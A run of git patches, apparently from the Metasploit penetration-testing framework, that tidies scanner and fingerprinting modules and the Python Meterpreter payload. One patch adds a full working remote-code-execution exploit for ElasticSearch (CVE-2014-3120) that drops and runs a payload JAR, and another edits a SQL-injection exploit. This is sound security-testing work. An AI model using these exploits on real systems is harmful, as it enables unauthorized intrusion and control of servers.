10:14:55 -0500 Subject: [PATCH 387/853] Do last code cleaning --- modules/auxiliary/gather/mybb_get_type_db.rb | 56 +++++++++----------- 1 file changed, 26 insertions(+), 30 deletions(-) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb index dd8a585a7a..f127e03616 100644 --- a/modules/auxiliary/gather/mybb_get_type_db.rb +++ b/modules/auxiliary/gather/mybb_get_type_db.rb @@ -10,21 +10,17 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'Determinant Databases MyBB ', + 'Name' => 'Determinant Databases MyBB ', 'Description' => %q{ - Determine the database in the forum. - This affects versions <= 1.6.12 + This module checks if MyBB is running behind an URL. Also uses a malformed query to + force an error and fingerprint the backend database used by MyBB. }, - 'Author' => + 'Author' => [ #http://www.linkedin.com/pub/arthur-karmanovskii/82/923/812 - 'Arthur Karmanovskii <fnsnic[at]gmail.com>'#Discovery and Metasploit Module - ], - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/3070' ] + 'Arthur Karmanovskii <fnsnic[at]gmail.com>' # Discovery and Metasploit Module ], + 'License' => MSF_LICENSE, 'DisclosureDate' => 'Feb 13 2014')) register_options( @@ -44,49 +40,49 @@ class Metasploit3 < Msf::Auxiliary 'intcheck' => 1 } }) - if res.nil? - print_error("Failed to retrieve webpage.") - return Exploit::CheckCode::Unknown - end - if res.code != 200 - print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") + if res.nil? || res.code != 200 return Exploit::CheckCode::Unknown end #Check PhP php_version = res['X-Powered-By'] if php_version - php_version = " PHP Version: #{php_version}".ljust(40) + php_version = "PHP #{php_version}" else - php_version = " PHP Version: unknown".ljust(40) + php_version = "PHP version unknown" end #Check Web-Server web_server = res['Server'] if web_server - web_server = " Server Version: #{web_server}".ljust(40) + web_server = "#{web_server}" else - web_server = " Server Version: unknown".ljust(40) + web_server = "unknown web server" end #Check forum MyBB if res.body.match("MYBB") - print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+web_server) + print_good("#{peer} - MyBB forum found running on #{web_server} / #{php_version}") return Exploit::CheckCode::Detected else - print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+web_server) - return Exploit::CheckCode::Unknown - end - rescue RuntimeError => err - print_error("Unhandled error in #{datastore['RHOST']}: #{err.class}: #{err}") return Exploit::CheckCode::Unknown end + rescue + return Exploit::CheckCode::Unknown + end end def run + print_status("#{peer} - Checking MyBB...") + unless check == Exploit::CheckCode::Detected + print_error("#{peer} - MyBB not found") + return + end + + print_status("#{peer} - Checking database...") uri = normalize_uri(target_uri.path, 'memberlist.php') response = send_request_cgi( { @@ -97,17 +93,17 @@ class Metasploit3 < Msf::Auxiliary } }) if response.nil? - print_error("Failed to retrieve webpage.") + print_error("#{peer} - Timeout...") return end #Resolve response if response.body.match(/SELECT COUNT\(\*\) AS users FROM mybb_users u WHERE 1=1 AND u.username NOT REGEXP\(\'\[a-zA-Z\]\'\)/) - print_good("Database is: PostgreSQL ;)") + print_good("#{peer} - Running PostgreSQL Database") elsif response.body.match(/General error\: 1 no such function\: REGEXP/) - print_good("Database is: SQLite ;)") + print_good("#{peer} - Running SQLite Database") else - print_status("Database MySQL or this is not forum MyBB or unknown Database") + print_status("#{peer} - Running MySQL or unknown database") end end end From b96c2dd0ca38da3feb1bd3af3cf46b8414fe0876 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Tue, 27 May 2014 10:15:39 -0500 Subject: [PATCH 388/853] Change module filename --- .../gather/{mybb_get_type_db.rb => mybb_db_fingerprint.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/gather/{mybb_get_type_db.rb => mybb_db_fingerprint.rb} (100%) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_db_fingerprint.rb similarity index 100% rename from modules/auxiliary/gather/mybb_get_type_db.rb rename to modules/auxiliary/gather/mybb_db_fingerprint.rb From 86221de10eaa9f012266658199861a924a168265 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Tue, 27 May 2014 10:18:27 -0500 Subject: [PATCH 389/853] Fix message --- modules/auxiliary/gather/mybb_db_fingerprint.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/mybb_db_fingerprint.rb b/modules/auxiliary/gather/mybb_db_fingerprint.rb index f127e03616..6dbdfeb160 100644 --- a/modules/auxiliary/gather/mybb_db_fingerprint.rb +++ b/modules/auxiliary/gather/mybb_db_fingerprint.rb @@ -48,7 +48,7 @@ class Metasploit3 < Msf::Auxiliary #Check PhP php_version = res['X-Powered-By'] if php_version - php_version = "PHP #{php_version}" + php_version = "#{php_version}" else php_version = "PHP version unknown" end From 1316365c2ff2179bfa63f38fe12ce7343ba40855 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Tue, 27 May 2014 10:22:39 -0500 Subject: [PATCH 390/853] Fix description --- modules/auxiliary/gather/mybb_db_fingerprint.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/mybb_db_fingerprint.rb b/modules/auxiliary/gather/mybb_db_fingerprint.rb index 6dbdfeb160..be3a6b5acc 100644 --- a/modules/auxiliary/gather/mybb_db_fingerprint.rb +++ b/modules/auxiliary/gather/mybb_db_fingerprint.rb @@ -13,7 +13,8 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'Determinant Databases MyBB ', 'Description' => %q{ This module checks if MyBB is running behind an URL. Also uses a malformed query to - force an error and fingerprint the backend database used by MyBB. + force an error and fingerprint the backend database used by MyBB on version 1.6.12 + and prior. }, 'Author' => [ From 69e82868387cf365021a0a51bd4e963710e7f1ce Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Tue, 27 May 2014 10:29:32 -0500 Subject: [PATCH 391/853] Fix title --- modules/auxiliary/gather/mybb_db_fingerprint.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/mybb_db_fingerprint.rb b/modules/auxiliary/gather/mybb_db_fingerprint.rb index be3a6b5acc..a2beedb07c 100644 --- a/modules/auxiliary/gather/mybb_db_fingerprint.rb +++ b/modules/auxiliary/gather/mybb_db_fingerprint.rb @@ -10,7 +10,7 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'Determinant Databases MyBB ', + 'Name' => 'MyBB Database Fingerprint', 'Description' => %q{ This module checks if MyBB is running behind an URL. Also uses a malformed query to force an error and fingerprint the backend database used by MyBB on version 1.6.12 From cc1e81ecb75ba859e69c42eee2e3999686979e82 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Tue, 27 May 2014 10:29:55 -0500 Subject: [PATCH 392/853] Add sqlite3 to Gemfile Fixes all the post modules that require it to parse pilfered sqlite DB files. --- Gemfile | 6 ++++-- Gemfile.lock | 2 ++ 2 files changed, 6 insertions(+), 2 deletions(-) diff --git a/Gemfile b/Gemfile index 9045947d35..fdc185f439 100755 --- a/Gemfile +++ b/Gemfile @@ -10,12 +10,14 @@ gem 'json' gem 'msgpack' # Needed by anemone crawler gem 'nokogiri' +# Needed by db.rb and Msf::Exploit::Capture +gem 'packetfu', '1.1.9' # Needed by JSObfu gem 'rkelly-remix', '0.0.6' # Needed by anemone crawler gem 'robots' -# Needed by db.rb and Msf::Exploit::Capture -gem 'packetfu', '1.1.9' +# Needed for some post modules +gem 'sqlite3' group :db do # Needed for Msf::DbManager diff --git a/Gemfile.lock b/Gemfile.lock index 8c708c0467..5517e4fb79 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -53,6 +53,7 @@ GEM multi_json (~> 1.0.3) simplecov-html (~> 0.5.3) simplecov-html (0.5.3) + sqlite3 (1.3.9) timecop (0.6.3) tzinfo (0.3.37) yard (0.8.7) @@ -82,5 +83,6 @@ DEPENDENCIES rspec (>= 2.12) shoulda-matchers simplecov (= 0.5.4) + sqlite3 timecop yard From 3de8beb5fd3bf5d2613205fbe3b8e7f84ae9fc55 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Tue, 27 May 2014 11:22:40 -0500 Subject: [PATCH 393/853] Clean code --- .../scanner/elasticsearch/es_enum.rb | 64 ++++++++++++++----- 1 file changed, 47 insertions(+), 17 deletions(-) diff --git a/modules/auxiliary/scanner/elasticsearch/es_enum.rb b/modules/auxiliary/scanner/elasticsearch/es_enum.rb index 804cc8fcc9..12895c27bc 100644 --- a/modules/auxiliary/scanner/elasticsearch/es_enum.rb +++ b/modules/auxiliary/scanner/elasticsearch/es_enum.rb @@ -13,47 +13,77 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'ElasticSearch Enum Utility', - 'Description' => %q{ Send a request to enumerate ElasticSearch indices}, + 'Name' => 'ElasticSearch Indeces Enumeration Utility', + 'Description' => %q{ + This module enumerates ElasticSearch Indeces. It uses the REST API + in order to make it. + }, 'Author' => [ - 'Silas Cutler <Silas.Cutler [at] BlackListThisDomain.com>' + 'Silas Cutler <Silas.Cutler[at]BlackListThisDomain.com>' ], 'License' => MSF_LICENSE )) - + register_options( [ Opt::RPORT(9200) ], self.class) end + def peer + "#{rhost}:#{rport}" + end + def run_host(ip) + vprint_status("#{peer} - Querying indeces...") begin res = send_request_raw({ 'uri' => '/_aliases', 'method' => 'GET', }) - - begin - json_body = JSON.parse(res.body) - rescue JSON::ParserError - print_error("Unable to parse JSON") + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable + vprint_error("#{peer} - Unable to establish connection") return end - if res and res.code == 200 and res.body.length > 0 - json_body.each do |index| - print_good("Index : " + index[0]) + if res && res.code == 200 && res.body.length > 0 + begin + json_body = JSON.parse(res.body) + rescue JSON::ParserError + vprint_error("#{peer} - Unable to parse JSON") + return end - - path = store_loot("elasticsearch.enum.file", "text/plain", ip, res.body, "ElasticSearch Enum Results") - print_good("Results saved to #{path}") else - print_error("Failed to save the result") + vprint_error("#{peer} - Timeout or unexpected response...") + return end - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable + report_service( + :host => rhost, + :port => rport, + :proto => 'tcp', + :name => 'elasticsearch' + ) + + indeces = [] + + json_body.each do |index| + indeces.push(index[0]) + report_note( + :host => rhost, + :port => rport, + :proto => 'tcp', + :type => "elasticsearch.index", + :data => index[0], + :update => :unique_data + ) end + + if indeces.length > 0 + print_good("#{peer} - ElasticSearch Indeces found: #{indeces.join(", ")}") + end + end + end From 2271afc1a5e7b8373067ff8d097791c523983ab5 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Tue, 27 May 2014 11:25:39 -0500 Subject: [PATCH 394/853] Change module filename --- .../scanner/elasticsearch/{es_enum.rb => indeces_enum.rb} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename modules/auxiliary/scanner/elasticsearch/{es_enum.rb => indeces_enum.rb} (100%) diff --git a/modules/auxiliary/scanner/elasticsearch/es_enum.rb b/modules/auxiliary/scanner/elasticsearch/indeces_enum.rb similarity index 100% rename from modules/auxiliary/scanner/elasticsearch/es_enum.rb rename to modules/auxiliary/scanner/elasticsearch/indeces_enum.rb From 7a29ae5f36c145e58fa750d8ae37206385c236d7 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Tue, 27 May 2014 18:01:16 -0500 Subject: [PATCH 395/853] Add module for CVE-2014-3120 --- .../multi/elasticsearch/script_mvel_rce.rb | 213 ++++++++++++++++++ 1 file changed, 213 insertions(+) create mode 100644 modules/exploits/multi/elasticsearch/script_mvel_rce.rb diff --git a/modules/exploits/multi/elasticsearch/script_mvel_rce.rb b/modules/exploits/multi/elasticsearch/script_mvel_rce.rb new file mode 100644 index 0000000000..9e5a2db466 --- /dev/null +++ b/modules/exploits/multi/elasticsearch/script_mvel_rce.rb @@ -0,0 +1,213 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ElasticSearch Dynamic Script Arbitrary Java Execution', + 'Description' => %q{ + This module exploits a remote command execution vulnerability in ElasticSearch, + exploitable by default on ElasticSearch prior to 1.2.0. The problem exists on + the REST API, accessible without authentication, neither authorization, where + the search function allows for dynamic scripts execution, which allows remote + attackers to execute arbitrary Java code. This module has been tested successfully + on ElasticSearch 1.1.1 on Ubuntu Server 12.04 and Windows XP SP3. + }, + 'Author' => + [ + 'Alex Brasetvik', # Vulnerability discovery + 'Bouke van der Bijl', # Vulnerability discovery and PoC + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2014-3120'], + ['OSVDB', '106949'], + ['EDB', '33370'], + ['URL', 'http://bouk.co/blog/elasticsearch-rce/'], + ['URL', 'https://www.found.no/foundation/elasticsearch-security/#staying-safe-while-developing-with-elasticsearch'] + ], + 'Platform' => 'java', + 'Arch' => ARCH_JAVA, + 'Targets' => + [ + [ 'ElasticSearch 1.1.1 / Automatic', { } ] + ], + 'DisclosureDate' => 'Dec 09 2013', + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(9200), + OptString.new('TARGETURI', [ true, 'The path to the ElasticSearch REST API', "/"]), + OptString.new("WritableDir", [ true, "A directory where we can write files (only for *nix environments)", "/tmp" ]) + ], self.class) + end + + def check + result = Exploit::CheckCode::Safe + + if vulnerable? + result = Exploit::CheckCode::Vulnerable + end + + result + end + + def exploit + print_status("#{peer} - Trying to execute arbitrary Java..") + unless vulnerable? + fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...") + end + + print_status("#{peer} - Asking remote OS...") + res = execute(java_os) + result = parse_result(res) + if result.nil? + fail_with(Failure::Unknown, "#{peer} - Could not get remote OS...") + else + print_good("#{peer} - OS #{result} found") + end + + jar_file = "" + if result =~ /win/i + print_status("#{peer} - Asking TEMP path") + res = execute(java_tmp_dir) + result = parse_result(res) + if result.nil? + fail_with(Failure::Unknown, "#{peer} - Could not get TEMP path...") + else + print_good("#{peer} - TEMP path found on #{result}") + end + jar_file = "#{result}#{rand_text_alpha(3 + rand(4))}.jar" + else + jar_file = File.join(datastore['WritableDir'], "#{rand_text_alpha(3 + rand(4))}.jar") + end + + register_file_for_cleanup(jar_file) + execute(java_payload(jar_file)) + end + + def vulnerable? + addend_one = rand_text_numeric(rand(3) + 1).to_i + addend_two = rand_text_numeric(rand(3) + 1).to_i + sum = addend_one + addend_two + + java = java_sum([addend_one, addend_two]) + res = execute(java) + result = parse_result(res) + + if result.nil? + return false + else + result.to_i == sum + end + end + + def parse_result(res) + unless res && res.code == 200 && res.body + return nil + end + + begin + json = JSON.parse(res.body.to_s) + rescue JSON::ParserError + return nil + end + + begin + result = json['hits']['hits'][0]['fields']['msf_result'][0] + rescue + return nil + end + + result + end + + def java_sum(summands) + source = <<-EOF +#{summands.join(" + ")} + EOF + + source + end + + def to_java_byte_array(str) + buff = "byte[] buf = new byte[#{str.length}];\n" + i = 0 + str.unpack('C*').each do |c| + buff << "buf[#{i}] = #{c};\n" + i = i + 1 + end + + buff + end + + def java_os + "System.getProperty(\"os.name\")" + end + + def java_tmp_dir + "System.getProperty(\"java.io.tmpdir\");" + end + + + def java_payload(file_name) + source = <<-EOF +import java.io.*; +import java.lang.*; +import java.net.*; + +#{to_java_byte_array(payload.encoded_jar.pack)} +File f = new File('#{file_name.gsub(/\\/, "/")}'); +FileOutputStream fs = new FileOutputStream(f); +bs = new BufferedOutputStream(fs); +bs.write(buf); +bs.close(); +bs = null; +URL u = f.toURI().toURL(); +URLClassLoader cl = new URLClassLoader(new java.net.URL[]{u}); +Class c = cl.loadClass('metasploit.Payload'); +c.main(null); + EOF + + source + end + + def execute(java) + payload = { + "size" => 1, + "query" => { + "filtered" => { + "query" => { + "match_all" => {} + } + } + }, + "script_fields" => { + "msf_result" => { + "script" => java + } + } + } + + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path.to_s, "_search"), + 'method' => 'POST', + 'data' => JSON.generate(payload) + }) + + return res + end + +end From 4b5c62ba8d14d38f1baa2f21b3ca73cbc5c80856 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <tod_beardsley@rapid7.com> Date: Wed, 28 May 2014 12:19:17 -0500 Subject: [PATCH 396/853] Dress up CAPWAP DoS desc a little. --- modules/auxiliary/dos/wireshark/capwap.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/dos/wireshark/capwap.rb b/modules/auxiliary/dos/wireshark/capwap.rb index c777d21b92..01c6c48a57 100644 --- a/modules/auxiliary/dos/wireshark/capwap.rb +++ b/modules/auxiliary/dos/wireshark/capwap.rb @@ -14,9 +14,9 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'Wireshark CAPWAP Dissector DoS', 'Description' => %q{ - This module inject a malicious udp packet to crash Wireshark 1.8.0 to 1.8.7 and 1.6.0 - to 1.6.15. The vulnerability exists in the capwap dissector which fails to handle an - incomplete packet. + This module injects a malformed UDP packet to crash Wireshark and TShark 1.8.0 to 1.8.7, as well + as 1.6.0 to 1.6.15. The vulnerability exists in the CAPWAP dissector which fails to handle a + packet correctly when an incorrect length is given. }, 'License' => MSF_LICENSE, 'Author' => From c89cd24621fff1a7473c65ef387c8f960a6f7024 Mon Sep 17 00:00:00 2001 From: joev <joev@metasploit.com> Date: Wed, 28 May 2014 13:31:00 -0500 Subject: [PATCH 397/853] Rewire some snmp modules to use print_error instead of print_status. --- modules/auxiliary/scanner/snmp/snmp_enum.rb | 10 +++++----- .../auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb | 8 ++++---- 2 files changed, 9 insertions(+), 9 deletions(-) diff --git a/modules/auxiliary/scanner/snmp/snmp_enum.rb b/modules/auxiliary/scanner/snmp/snmp_enum.rb index 10019cf58d..595c6dd28c 100644 --- a/modules/auxiliary/scanner/snmp/snmp_enum.rb +++ b/modules/auxiliary/scanner/snmp/snmp_enum.rb @@ -946,17 +946,17 @@ class Metasploit3 < Msf::Auxiliary rescue SNMP::RequestTimeout - vprint_status("#{ip} SNMP request timeout.") + print_error("#{ip} SNMP request timeout.") rescue Rex::ConnectionError - print_status("#{ip} Connection refused.") + print_error("#{ip} Connection refused.") rescue SNMP::InvalidIpAddress - print_status("#{ip} Invalid IP Address. Check it with 'snmpwalk tool'.") + print_error("#{ip} Invalid IP Address. Check it with 'snmpwalk tool'.") rescue SNMP::UnsupportedVersion - print_status("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.") + print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.") rescue ::Interrupt raise $! rescue ::Exception => e - print_status("Unknown error: #{e.class} #{e}") + print_error("Unknown error: #{e.class} #{e}") elog("Unknown error: #{e.class} #{e}") elog("Call stack:\n#{e.backtrace.join "\n"}") ensure diff --git a/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb b/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb index bacfdd15b7..be8dc52a9c 100644 --- a/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb +++ b/modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb @@ -136,15 +136,15 @@ class Metasploit3 < Msf::Auxiliary disconnect_snmp rescue SNMP::RequestTimeout - vprint_status("#{ip}, SNMP request timeout.") + print_error("#{ip}, SNMP request timeout.") rescue Errno::ECONNREFUSED - vprint_status("#{ip}, Connection refused.") + print_error("#{ip}, Connection refused.") rescue SNMP::InvalidIpAddress - vprint_status("#{ip}, Invalid IP Address. Check it with 'snmpwalk tool'.") + print_error("#{ip}, Invalid IP Address. Check it with 'snmpwalk tool'.") rescue ::Interrupt raise $! rescue ::Exception => e - vprint_error("#{ip}, Unknown error: #{e.class} #{e}") + print_error("#{ip}, Unknown error: #{e.class} #{e}") end end end From 15b1c79039dcb2cc1a12206d35be0ad2360da300 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre <zeroSteiner@gmail.com> Date: Wed, 28 May 2014 16:30:27 -0400 Subject: [PATCH 398/853] Adjust whitespace and set bytes to str for Python 2 --- data/meterpreter/meterpreter.py | 7 +++++-- modules/payloads/stagers/python/bind_tcp.rb | 2 +- modules/payloads/stagers/python/reverse_tcp.rb | 2 +- modules/payloads/stages/python/meterpreter.rb | 3 ++- 4 files changed, 9 insertions(+), 5 deletions(-) diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py index 979ebb4107..058a6c9215 100644 --- a/data/meterpreter/meterpreter.py +++ b/data/meterpreter/meterpreter.py @@ -16,6 +16,9 @@ import subprocess import sys import threading +if sys.version_info[0] < 3: + bytes = str + # # Constants # @@ -286,7 +289,7 @@ class PythonMeterpreter(object): break req_length, req_type = struct.unpack('>II', request) req_length -= 8 - request = '' + request = bytes() while len(request) < req_length: request += self.socket.recv(4096) response = self.create_response(request) @@ -487,7 +490,7 @@ class PythonMeterpreter(object): try: #print("[*] running method {0}".format(handler_name)) result, resp = handler(request, resp) - except Exception, err: + except Exception: #print("[-] method {0} resulted in an error".format(handler_name)) result = ERROR_FAILURE else: diff --git a/modules/payloads/stagers/python/bind_tcp.rb b/modules/payloads/stagers/python/bind_tcp.rb index 50e8974123..356a3fcfbf 100644 --- a/modules/payloads/stagers/python/bind_tcp.rb +++ b/modules/payloads/stagers/python/bind_tcp.rb @@ -22,7 +22,7 @@ module Metasploit3 'Arch' => ARCH_PYTHON, 'Handler' => Msf::Handler::BindTcp, 'Stager' => {'Payload' => ""} - )) + )) end # diff --git a/modules/payloads/stagers/python/reverse_tcp.rb b/modules/payloads/stagers/python/reverse_tcp.rb index 4f741f0c52..5f4e0cf92e 100644 --- a/modules/payloads/stagers/python/reverse_tcp.rb +++ b/modules/payloads/stagers/python/reverse_tcp.rb @@ -22,7 +22,7 @@ module Metasploit3 'Arch' => ARCH_PYTHON, 'Handler' => Msf::Handler::ReverseTcp, 'Stager' => {'Payload' => ""} - )) + )) end # diff --git a/modules/payloads/stages/python/meterpreter.rb b/modules/payloads/stages/python/meterpreter.rb index 63fce13671..6c497f080c 100644 --- a/modules/payloads/stages/python/meterpreter.rb +++ b/modules/payloads/stages/python/meterpreter.rb @@ -20,7 +20,8 @@ module Metasploit3 'Platform' => 'python', 'Arch' => ARCH_PYTHON, 'License' => MSF_LICENSE, - 'Session' => Msf::Sessions::Meterpreter_Python_Python)) + 'Session' => Msf::Sessions::Meterpreter_Python_Python + )) end def generate_stage From 8a2236ecbbc5275671f1253d04551fe017bd7dbb Mon Sep 17 00:00:00 2001 From: William Vu <William_Vu@rapid7.com> Date: Thu, 29 May 2014 04:42:49 -0500 Subject: [PATCH 399/853] Fix the last of the Set-Cookie msftidy warnings --- modules/auxiliary/crawler/msfcrawler.rb | 5 ----- modules/auxiliary/scanner/http/crawler.rb | 4 ++-- .../exploits/multi/http/dexter_casinoloader_exec.rb | 10 +++++----- 3 files changed, 7 insertions(+), 12 deletions(-) diff --git a/modules/auxiliary/crawler/msfcrawler.rb b/modules/auxiliary/crawler/msfcrawler.rb index fbd7ec2175..27c3e2e3e4 100644 --- a/modules/auxiliary/crawler/msfcrawler.rb +++ b/modules/auxiliary/crawler/msfcrawler.rb @@ -258,11 +258,6 @@ class Metasploit3 < Msf::Auxiliary # In case modules or crawler calls to_s on de-chunked responses # resp.transfer_chunked = false - if resp['Set-Cookie'] - #puts "Set Cookie: #{resp['Set-Cookie']}" - #puts "Storing in cookie jar for host:port #{reqopts['rhost']}:#{reqopts['rport']}" - #$cookiejar["#{reqopts['rhost']}:#{reqopts['rport']}"] = resp['Set-Cookie'] - end if datastore['StoreDB'] storedb(reqopts,resp,$dbpathmsf) diff --git a/modules/auxiliary/scanner/http/crawler.rb b/modules/auxiliary/scanner/http/crawler.rb index 344cf57458..0915ee3da3 100644 --- a/modules/auxiliary/scanner/http/crawler.rb +++ b/modules/auxiliary/scanner/http/crawler.rb @@ -104,8 +104,8 @@ class Metasploit3 < Msf::Auxiliary info[:ctype] = page.headers['content-type'] end - if page.headers['set-cookie'] - info[:cookie] = page.headers['set-cookie'] + if !page.get_cookies.empty? + info[:cookie] = page.get_cookies end if page.headers['authorization'] diff --git a/modules/exploits/multi/http/dexter_casinoloader_exec.rb b/modules/exploits/multi/http/dexter_casinoloader_exec.rb index 9e4e795987..f7844589e7 100644 --- a/modules/exploits/multi/http/dexter_casinoloader_exec.rb +++ b/modules/exploits/multi/http/dexter_casinoloader_exec.rb @@ -79,8 +79,8 @@ class Metasploit3 < Msf::Exploit::Remote 'page' => Rex::Text.encode_base64("' AND 1=2 UNION ALL SELECT 1," + column + ",3 FROM " + table + " LIMIT 1 OFFSET " + row.to_s + " -- --") } }) - if res and res.headers.has_key?('Set-Cookie') and res.headers['Set-Cookie'].start_with?('response=') - return Rex::Text.decode_base64(URI.unescape(res.headers['Set-Cookie']['response='.length..-1]))[1..-3] + if res and !res.get_cookies.empty? and res.get_cookies.start_with?('response=') + return Rex::Text.decode_base64(URI.unescape(res.get_cookies['response='.length..-1]))[1..-3] end return false end @@ -96,8 +96,8 @@ class Metasploit3 < Msf::Exploit::Remote } }) - if res and res.headers.has_key?('Set-Cookie') and res.headers['Set-Cookie'].start_with?('response=') and - Rex::Text.decode_base64(URI.unescape(res.headers['Set-Cookie']['response='.length..-1])) == '$' + testvalue + ';#' and database_get_field('users', 'name', 0) != false + if res and !res.get_cookies.empty? and res.get_cookies.start_with?('response=') and + Rex::Text.decode_base64(URI.unescape(res.get_cookies['response='.length..-1])) == '$' + testvalue + ';#' and database_get_field('users', 'name', 0) != false return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe @@ -167,4 +167,4 @@ class Metasploit3 < Msf::Exploit::Remote return end end -end \ No newline at end of file +end From aa85cb8195819a4f41604931c22dbc659066da21 Mon Sep 17 00:00:00 2001 From: Tom Sellers <tom@fadedcode.net> Date: Thu, 29 May 2014 05:46:32 -0500 Subject: [PATCH 400/853] Update powershell.rb --- lib/msf/core/post/windows/powershell.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/post/windows/powershell.rb b/lib/msf/core/post/windows/powershell.rb index 867772db1b..b77da4a5e3 100644 --- a/lib/msf/core/post/windows/powershell.rb +++ b/lib/msf/core/post/windows/powershell.rb @@ -19,7 +19,7 @@ module Powershell # Returns true if powershell is installed # def have_powershell? - cmd_out = cmd_exec("cmd.exe /c echo. | powershell get-host") + cmd_out = cmd_exec('cmd.exe /c "echo. | powershell get-host"') return true if cmd_out =~ /Name.*Version.*InstanceId/m return false end From 145776db4d3fa4b4b2c838efe4da131f298c57c5 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre <zeroSteiner@gmail.com> Date: Thu, 29 May 2014 10:52:49 -0400 Subject: [PATCH 401/853] Add a DEBUGGING option to the python meterpreter --- data/meterpreter/meterpreter.py | 100 ++++++++++-------- modules/payloads/stages/python/meterpreter.rb | 8 ++ 2 files changed, 62 insertions(+), 46 deletions(-) diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py index 058a6c9215..f80318e13d 100644 --- a/data/meterpreter/meterpreter.py +++ b/data/meterpreter/meterpreter.py @@ -1,12 +1,5 @@ #!/usr/bin/python import code -try: - import ctypes -except: - has_windll = False -else: - has_windll = hasattr(ctypes, 'windll') - import os import random import select @@ -15,13 +8,29 @@ import struct import subprocess import sys import threading +import traceback + +try: + import ctypes +except ImportError: + has_windll = False +else: + has_windll = hasattr(ctypes, 'windll') if sys.version_info[0] < 3: - bytes = str + is_bytes = lambda obj: issubclass(obj.__class__, str) + bytes = lambda *args: str(*args[:1]) + NULL_BYTE = '\x00' +else: + is_bytes = lambda obj: issubclass(obj.__class__, bytes) + str = lambda x: __builtins__['str'](x, 'UTF-8') + NULL_BYTE = bytes('\x00', 'UTF-8') # # Constants # +DEBUGGING = False + PACKET_TYPE_REQUEST = 0 PACKET_TYPE_RESPONSE = 1 PACKET_TYPE_PLAIN_REQUEST = 10 @@ -103,6 +112,7 @@ TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502 TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503 EXPORTED_SYMBOLS = {} +EXPORTED_SYMBOLS['DEBUGGING'] = DEBUGGING def export(symbol): EXPORTED_SYMBOLS[symbol.__name__] = symbol @@ -128,25 +138,6 @@ def inet_pton(family, address): return ''.join(map(chr, lpAddress[8:24])) raise Exception('no suitable inet_pton functionality is available') -@export -def packet_get_tlv(pkt, tlv_type): - offset = 0 - while (offset < len(pkt)): - tlv = struct.unpack('>II', pkt[offset:offset+8]) - if (tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type: - val = pkt[offset+8:(offset+8+(tlv[0] - 8))] - if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING: - val = val.split('\x00', 1)[0] - elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT: - val = struct.unpack('>I', val)[0] - elif (tlv[1] & TLV_META_TYPE_BOOL) == 